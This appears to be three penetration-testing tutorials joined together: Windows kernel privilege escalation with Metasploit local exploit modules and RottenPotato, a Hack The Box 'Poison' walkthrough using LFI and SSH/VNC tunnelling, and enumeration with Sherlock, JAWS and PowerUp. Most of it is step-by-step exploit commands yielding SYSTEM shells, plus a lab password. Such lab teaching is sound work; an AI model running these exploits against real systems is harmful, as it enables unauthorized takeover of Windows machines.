Windows Kernel Exploit Privilege Escalation

Hello Friends!! In our previous article we had discussed “Vectors of Windows Privilege Escalation using automated script” and today we are demonstrating the Windows privilege escalation via Kernel exploitation methodologies. For this purpose, we will utilize an in-built Metasploit module known as Local Exploit Suggester. The objective of this suggester is to just identify what parts of a system can be exploitable and to give us an insight on the best matching possible exploits available ,which can be further utilized to elevate the privileges .

Table of content

§  Windows-Exploit-suggester

§  Windows ClientCopyImage Win32k Exploit

§  Windows TrackPopupMenu Win32k NULL Pointer Dereference

§  Windows SYSTEM Escalation via KiTrap0D

§  Windows Escalate Task Scheduler XML Privilege Escalation

§  MS16-016 mrxdav.sys WebDav Local Privilege Escalation

§  EPATHOBJ::pprFlattenRec Local Privilege Escalation

§  MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow

§  MS16-032 Secondary Logon Handle Privilege Escalation

§  RottenPotato

Windows-Exploit-suggester

The Metasploit in-built module suggests various local exploits that can be used to perform Privilege escalation and provides a suggestion based on the architecture, platform (i.e the operating system it's being run on), session type and required default options. It saves our time as we don't have to manually search around for local exploits, until none of the option provided works.

It is also significant to note that , not ALL of these listed local exploits will be fired.

Usage

Note : For using the local exploit suggester, we must already have a Meterpreter session opened for our target machine. However, before running the Local Exploit suggester we need to put our existing active Meterpreter session to background (CTRL + Z)

Below is the example of the same, let’s say our existing active Meterpreter session is 1

searchsploit exploit_suggester

use post/multi/recon/local_exploit_suggester

set LHOST 192.168.1.107

set SESSION 1

exploit

As you can observe it has suggested some post exploits against which the target is vulnerable and that can provide higher-privilege shell.

Windows ClientCopyImage Win32k Exploit

Vulnerabilities in Windows Kernel-Mode Drivers could allow elevation of privilege. This module exploits improper object handling in the win32k.sys kernel mode driver.

This module has been tested on vulnerable builds of Windows 7 x64 and x86, Windows 2008 R2 SP1 x64.

Let’s navigate to MSF console and execute this exploit

use exploit/windows/local/ms15_051_client_copy_image

set lhost 192.168.1.107

set session 1

exploit

Another Meterpreter session gets opened, once the selected exploit has been executed

getsystem

getuid

As we can see that we are logged into the system as Windows privileged user NT AUTHORITY\SYSTEM

Windows TrackPopupMenu Win32k NULL Pointer Dereference

 This module exploits a NULL Pointer Dereference in win32k.sys, the vulnerability can be triggered through the use of TrackPopupMenu. Under special conditions, the NULL pointer dereference can be abused on xxxSendMessageTimeout to achieve arbitrary code execution.

This module has been tested on Windows XP SP3, Windows Server 2003 SP2, Windows 7 SP1 Windows Server 2008 32bits and Windows Server 2008 R2 SP1 64 bits.

Let’s navigate to MSF console and execute this exploit

use exploit/windows/local/ms14_058_track_popup_menu

set lhost 192.168.1.107

set session 1

exploit

Another Meterpreter session gets opened ,once the selected exploit has been executed

getsystem

getuid

As we can see that we are logged into the system as Windows privileged user NT AUTHORITY\SYSTEM

Windows SYSTEM Escalation via KiTrap0D

This module will create a new session with SYSTEM privileges via the KiTrap0D exploit If the session in use is already elevated then the exploit will not run. The module relies on kitrap0d.x86.dll, and is not supported on x64 editions of Windows.

This module has been tested on vulnerable builds of Windows Server 2003, Windows Server 2008, Windows 7, XP for 32-bit Systems.

Let’s navigate to MSF console and execute this exploit

use exploit/windows/local/ms10_015_kitrap0d

set lhost 192.168.1.107

set session 1

exploit

Another Meterpreter session gets opened, once the selected exploit has been executed

getsystem

getuid

As we can see that we are logged into the system as Windows privileged user NT AUTHORITY\SYSTEM

Windows Escalate Task Scheduler XML Privilege Escalation

This Vulnerability in Task Scheduler could allow elevation of privileges

This security update resolves a publicly disclosed vulnerability in Windows Task Scheduler. The vulnerability could allow elevation of privilege if an attacker logged on to an affected system and ran a specially crafted application. An attacker must have valid logon credentials and be able to log on locally to exploit this vulnerability. The vulnerability could not be exploited remotely or by anonymous users.

This module has been tested on vulnerable builds of Windows Vista , Windows 7 , Windows Server 2008 x64 and x86

Let’s navigate to MSF console and execute this exploit

use exploit/windows/local/ms10_092_schelevator

set lhost 192.168.1.107

set session 1

exploit

Another Meterpreter session gets opened, once the selected exploit has been executed

getsystem

getuid

As we can see that we are logged into the system as Windows privileged user NT AUTHORITY\SYSTEM

MS16-016 mrxdav.sys WebDav Local Privilege Escalation

This module exploits the vulnerability in mrxdav.sys described by MS16-016. The module will spawn a process on the target system and elevate its privileges to NT AUTHORITY\SYSTEM before executing the specified payload within the context of the elevated process.

This module has been tested on vulnerable build of Windows 7 SP1 ,x86 architecture

Let’s navigate to MSF console and execute this exploit

use exploit/windows/local/ms16_016_webdav

set lhost 192.168.1.107

set session 1

exploit

Another Meterpreter session gets opened ,once the selected exploit has been executed

getsystem

getuid

As we can see that we are logged into the system as Windows privileged user NT AUTHORITY\SYSTEM

EPATHOBJ::pprFlattenRec Local Privilege Escalation

This module exploits a vulnerability on EPATHOBJ::pprFlattenRec due to the usage of uninitialized data which allows to corrupt memory.

At the moment, the module has been tested successfully on Windows XP SP3, Windows 2003 SP1, and Windows 7 SP1.

Let’s navigate to MSF console and execute this exploit

use exploit/windows/local/ppr_flatten_rec

set lhost 192.168.1.107

set session 1

exploit

Another Meterpreter session gets opened, once the selected exploit has been executed

getsystem

getuid

As we can see that we are logged into the system as Windows privileged user NT AUTHORITY\SYSTEM

MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow

A kernel pool overflow in Win32k which allows local privilege escalation. The kernel shellcode nulls the ACL for the winlogon.exe process (a SYSTEM process). This allows any unprivileged process to freely migrate to winlogon.exe, achieving privilege escalation. Used in pwn2own 2013 by MWR to break out of chrome's sandbox. NOTE: when you exit the meterpreter session, winlogon.exe is likely to crash.

At the moment, the module has been tested successfully on Windows 7 SP1 x86

Let’s navigate to MSF console and execute this exploit

use exploit/windows/local/ms13_053_ schlamperei

set lhost 192.168.1.107

set session 1

exploit

Another Meterpreter session gets opened, once the selected exploit has been executed

getsystem

getuid

As we can see that we are logged into the system as Windows privileged user NT AUTHORITY\SYSTEM

MS16-032 Secondary Logon Handle Privilege Escalation

This module exploits the lack of sanitization of standard handles in Windows' Secondary Logon Service. The vulnerability is known to affect versions of Windows 7-10 and 2k8-2k12 32 and 64 bit. This module will only work against those versions of Windows with Powershell 2.0 or later and systems with two or more CPU cores.

use exploit/windows/local/ms16_032_secondary_logon_handle_privesc

set session 1

exploit

Another Meterpreter session gets opened, once the selected exploit has been executed

getsystem

getuid

As we can see that we are logged into the system as Windows privileged user NT AUTHORITY\SYSTEM

RottenPotato

RottenPotato local privilege escalation from service account to SYSTEM.

It is important to impersonate the token (or run list_tokens -u) quickly after runnning the binary. With the current implementation, the token seems to disappear shortly after the binary is run. It is also important to follow the order of the steps. Make sure you "use incognito" before running the binary.

Incognito option in meterpreter session was originally a stand-alone application that permitted you to impersonate user tokens when successfully compromising a system. And then we need to do first is identify if there are any valid tokens on this system.

load incognito

list_token -u

If we talk related to impersonate token then you can see currently there is no token available.

Now downloads Rottenpotato from github for privilege escalation.

git clone https://github.com/foxglovesec/RottenPotato.git

cd RottenPotato

After downloading it will give rottenpotato.exe file.

Upload the exe file into victim’s machine

upload /root/Desktop/RottenPotato/rottenpotato.exe .

Now type below command for executing exe file and then add SYSTEM token under impersonate user tokens.

execute -Hc -f rottenpotato.exe

impersonate_token "NT AUTHORITY\\SYSTEM"

As we can see that we are logged into the system as Windows privileged user NT AUTHORITY\SYSTEM

Hack the box: Poison Walkthrough

Hello everyone and welcome to yet another CTF challenge from hack the box, called ‘Poison,’ which is available online for those who want to increase their skill in penetration testing and black box testing. Poison is a retired vulnerable lab presented by Hack the Box for making online penetration testing practice suitable to your experience level; they have a large collection of vulnerable labs as challenges, ranging from beginner to expert level.

Level: Easy

Task: Find user.txt and root.txt in victim’s machine

Methodology:

1.      Port scanning

2.      Using LFI to find username

3.      Gaining encrypted password file using LFI

4.      Decrypting password file

5.      Logging in to SSH using decrypted password

6.      Transferring ZIP file and extracting to find a secret file

7.      Discovery of VNC on machine

8.      VNC tunneling over SSH to get root shell

9.      Grabbing flag

Let’s get started then!

Since, these labs have a static IP, the IP address for poison is 10.10.10.84.

Let us scan the VM with the most popular port scanning tool, nmap.

Nmap –A 10.10.10.84

From the result above we found two working ports on the VM, port 22 and 80 which are universal default ports for SSH and HTTP.

We immediately headed over to the webpage.

It was crystal clear only by reading that there was an LFI vulnerability involved. We tested it by inputting /etc/passwd in the scriptname section.

Which led us to the following output

From here we found that the username was “charix.” But before moving on to that part we tried all the scriptnames one by one given in the previous webpage.

It was going all monotonous until we found an interesting textfile in the “listfiles.php” script.

The listfiles.php was a script that enumerated an array of the files

We found an interesting file called pwdbackup.txt. On opening it by the same process we found an encrypted password.

But it wasn’t a normal encryption, the password was encrypted 13 times. Just by looking we could tell that it was base64 encoding. So, we copied the password in a notepad file and removed the spaces between the password’s lines (present by default) and wrote the following command to decrypt it:

cat decode | base64 -d| base64 -d| base64 -d| base64 -d| base64 -d| base64 -d| base64 -d| base64 -d| base64 -d| base64 -d| base64 -d| base64 -d| base64 –d

Voila! The password was found to be Charix!2#4%6&8(0.

A complete logical shot in the dark was that it was the password to secure shell of the victim. So, we tried logging in to SSH.

ssh charix@10.10.10.84

ls

And just like that we were logged in! We found the first flag (user.txt) and another file called secret.zip

We tried unzipping it on the spot but it didn’t work. So, instead we transferred the file to our system using scp (complete article here)

scp charix@10.10.10.84:secret.zip /root/Desktop/

cd Desktop

unzip secret.zip

We got a file “secret” which could be the password of another service.

We were far from convinced that no other service was running so we scanned the victim using socat. (To read more: https://packages.debian.org/sid/sockstat)

Socat -4 -l

Port number 5901 and 5908 were open which clearly are the port numbers for VNC! This could be way in.

We followed the SSH tunneling methodology (refer here)

ssh -L 5901:127.0.0.1:5901 charix@10.10.10.84

IT will open up a shell. In a new terminal write:

vncviewer -passwd secret 127.0.0.1:5901

We saw authentication successful tag!

What was left now but to:

Ls

Cat root.txt

Window Privilege Escalation via Automated Script

We all know that, after compromising the victim’s machine we have a low-privileges shell that we want to escalate into a higher-privileged shell and this process is known as Privilege Escalation. Today in this article we will discuss what comes under privilege escalation and how an attacker can identify that low-privileges shell can be escalated to higher-privileged shell.

Table of Content

§  Introduction

§  Vectors of Privilege Escalation

§  Windows-Exploit-Suggester

§  Windows Gather Applied Patches

§  Sherlock

§  JAWS - Just Another Windows (Enum) Script

§  PowerUp

Introduction

Basically privilege escalation is a phase that comes after the attacker has compromised the victim’s machine where he try to gather critical information related to system such as hidden password and weak configured services or applications and etc. All these information help the attacker to make the post exploit against machine for getting higher-privileged shell.

Vectors Privilege Escalation

Following information are considered as critical Information of Windows System:

§  Version of operating system

§  Any Vulnerable package installed or running

§  Files and Folders with Full Control or Modify Access

§  Mapped Drives

§  Potentially Interesting Files

§  Unquoted Service Paths

§  Network Information (interfaces, arp, netstat)

§  Firewall Status and Rules

§  Running Processes

§  AlwaysInstallElevated Registry Key Check

§  Stored Credentials

§  DLL Hijacking

§  Scheduled Tasks

There are several script use in Penetration testing for quickly identify potential privilege escalation vectors on Windows systems and today we are going to elaborate each script which is working smoothly.

Windows-Exploit-Suggester

If you have victim’s low-privilege meterpreter or command session then use can use Exploit-Suggester.

This module suggests local meterpreter exploits that can be used. The exploits are suggested based on the architecture and platform that the user has a shell opened as well as the available exploits in meterpreter. It's important to note that not all local exploits will be fired. Exploits are chosen based on these conditions: session type, platform, architecture, and required default options.

use post/multi/recon/local_exploit_suggester

msf post(local_exploit_suggester) > set lhost 192.168.1.107

msf post(local_exploit_suggester) > set session 1

msf post(local_exploit_suggester) > exploit

As you can observe it has suggested some post exploits against which the target is vulnerable and that can provide higher-privilege shell.

Windows Gather Applied Patches

This module will attempt to enumerate which patches are applied to a windows system based on the result of the WMI query: SELECT HotFixID FROM Win32_QuickFixEngineering.

use post/windows/gather/enum_patches

msf post(enum_patches) > set session 1

msf post(enum_patches) > exploit

As you can observe it has also shown that the target is possibly vulnerable to recommended exploit that can provide higher-privilege shell.

Sherlock

It is a PowerShell script to quickly find the missing software patches for local privilege escalation vulnerabilities. It also as similar as above post exploit as gives suggestion the target is possibly vulnerable to recommended exploit that can provide higher-privilege shell.

Download it from git hub with help of following command and execute when you have victim’s meterpreter session at least once.

git clone https://github.com/rasta-mouse/Sherlock.git

Since this script should be execute in power shell therefore load power shell and then import the downloading script.

load powershell

powershell_import ‘/root/Desktop/Sherlock/Sherlock.ps1’

powershell_execute “find-allvulns”

The above command will show that the target is possibly vulnerable to recommended exploit that can be used to achieve higher-privilege shell.

JAWS - Just Another Windows (Enum) Script

JAWS is PowerShell script designed to help penetration testers (and CTFers) quickly identify potential privilege escalation vectors on Windows systems. It is written using PowerShell 2.0 so 'should' run on every Windows version since Windows 7.

Current Features

·         Network Information (interfaces, arp, netstat)

·         Firewall Status and Rules

·         Running Processes

·         Files and Folders with Full Control or Modify Access

·         Mapped Drives

·         Potentially Interesting Files

·         Unquoted Service Paths

·         Recent Documents

·         System Install Files

·         AlwaysInstallElevated Registry Key Check

·         Stored Credentials

·         Installed Applications

·         Potentially Vulnerable Services

·         MuiCache Files

·         Scheduled Tasks

git clone https://github.com/411Hall/JAWS.git

Once you have meterpreter shell, upload the downloaded script and use command shell to run the uploaded script

powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt

It will store the critical information into a text file named as “JAWS-Enum.txt

As said the JAWS-Enum.txt file must have been stored the vector that can lead to privilege escalation, let’s open it and figure out the result.

In the following image you can observe it has shown all user name and IP configuration.

In this image we can clearly observe the result of NetStat.

In this image we can clearly observe the result of running process and services.

In this image we can clearly observe all install program and patches.

In this image we can clearly observe the folder with full control and Modify Access and hence many more information can be extracted by running this script.

PowerUp

PowerUp is a powershell tool to assist with local privilege escalation on Windows systems. PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations.

Running Invoke-AllChecks will output any identifiable vulnerabilities along with specifications for any abuse functions. The -HTMLReport flag will also generate a COMPUTER.username.html version of the report.

Current Feature

Service Enumeration:

§  Get-ServiceUnquoted : -   returns services with unquoted paths that also have a space in the name.

§  Get-ModifiableServiceFile :-   returns services where the current user can write to the service binary path or its config.

§  Get-ModifiableService : -   returns services the current user can modify.

§  Get-ServiceDetail :-   returns detailed information about a specified service.

Service Abuse:

§  Invoke-ServiceAbuse :  -   modifies a vulnerable service to create a local admin or execute a custom command.

§  Write-ServiceBinary : -   writes out a patched C# service binary that adds a local admin or executes a custom command.

§  Install-ServiceBinary :-   replaces a service binary with one that adds a local admin or executes a custom command.

§  Restore-ServiceBinary :-   restores a replaced service binary with the original executable.

DLL Hijacking:

§  Find-ProcessDLLHijack : -   finds potential DLL hijacking opportunities for currently running processes

§  Find-PathDLLHijack :-   finds service %PATH% DLL hijacking opportunities

§  Write-HijackDll : -   writes out a hijackable DLL

Registry Checks:

§  Get-RegistryAlwaysInstallElevated :-  checks if the AlwaysInstallElevated registry key is set

§  Get-RegistryAutoLogon :-   checks for Autologon credentials in the registry

§  Get-ModifiableRegistryAutoRun :-   checks for any modifiable binaries/scripts (or their configs) in HKLM autoruns.

Now use following command to download it from git hub as said above powerUp is the module of powersploit therefore we need to download package of powersploit.

git clone https://github.com/PowerShellMafia/PowerSploit.git

cd PowerSploit

ls

cd Privesc

ls

Again load power shell and then import the downloading script.

load powershell

powershell_import ‘/root/Desktop/PowerSploit/Privesc/PowerUp.ps1’

powershell_execute Invoke-AllChecks

The above command will show that the target is possibly vulnerable to recommended exploit that can be used to achieve higher-privilege shell.